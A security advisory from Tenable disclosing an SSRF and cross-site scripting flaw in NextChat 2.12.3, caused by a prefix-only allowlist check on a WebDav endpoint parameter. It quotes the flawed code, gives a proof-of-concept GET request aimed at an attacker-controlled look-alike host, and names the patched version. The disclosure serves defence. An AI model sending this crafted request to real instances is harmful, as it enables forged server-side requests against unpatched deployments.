Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

NextChat Server-Side Request Forgery / Cross-Site Scripting

High

Synopsis

NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.

The vulnerability exists because of the following code snippet

// Validate the endpoint to prevent potential SSRF attacks
  if (
    !mergedAllowedWebDavEndpoints.some(
      (allowedEndpoint) => endpoint?.startsWith(allowedEndpoint),
    )
  )

This check seems incomplete because it validates if the URL specified in the endpoint GET parameter starts with the URL declared in the following file :

export const internalAllowedWebDavEndpoints = [
  "https://dav.jianguoyun.com/dav/",
  "https://dav.dropdav.com/",
  "https://dav.box.com/dav",
  "https://nanao.teracloud.jp/dav/",
  "https://bora.teracloud.jp/dav/",
  "https://webdav.4shared.com/",
  "https://dav.idrivesync.com",
  "https://webdav.yandex.com",
  "https://app.koofr.net/dav/Koofr",
];

Some allowed URLs do not enforce the trailing slash or a specific folder, allowing an attacker to forge a valid URL which can then pass through the SSRF verification and trigger an arbitrary HTTPS call from the vulnerable instance.

Proof Of Concept:

In order to reproduce the issue, it is possible to create an attacker-controller hostname like webdav.yandex.com.attacker.tld and perform the following HTTP request : 

GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.attacker.tld/ HTTP/1.1
Host: VULNERABLE_NEXTCHAT_INSTANCE
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

The vulnerable instance will then issue a HTTPS request to https://webdav.yandex.com.attacker.tld.

Solution

Upgrade to NextChat 2.12.4 or later.

Disclosure Timeline

18 June 2024 - Vulnerability discovered. Tenable send private security report on GitHub repository.
24 June 2024 - Vendor accepts the security report on GitHub and discloses the advisory after releasing patch in version 2.12.4.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2024-38514
Tenable Advisory ID: TRA-2024-23
Credit:
Rémy Marot
CVSSv3 Base / Temporal Score:
7.4 / 6.9
CVSSv3 Vector:
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
Affected Products:
NextChat < 2.12.4
Risk Factor:
High

Advisory Timeline

June 25, 2024 - Initial release